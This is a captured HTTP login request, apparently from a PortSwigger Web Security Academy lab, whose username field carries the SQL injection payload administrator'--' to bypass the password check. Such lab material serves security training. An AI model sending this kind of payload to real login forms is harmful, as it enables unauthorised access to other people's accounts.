POST /login HTTP/1.1
Host: ac9d1fe91ed7e38380e40e74002b00c9.web-security-academy.net
Connection: close
Content-Length: 76
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://ac9d1fe91ed7e38380e40e74002b00c9.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ac9d1fe91ed7e38380e40e74002b00c9.web-security-academy.net/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=Ozb135f5HMidqzrwO2Ul9QGoig3giBh7

csrf=Z6f5TlfxLnoT6dV7ECeHRowJy7vC83DQ&username=administrator'--'&password=123456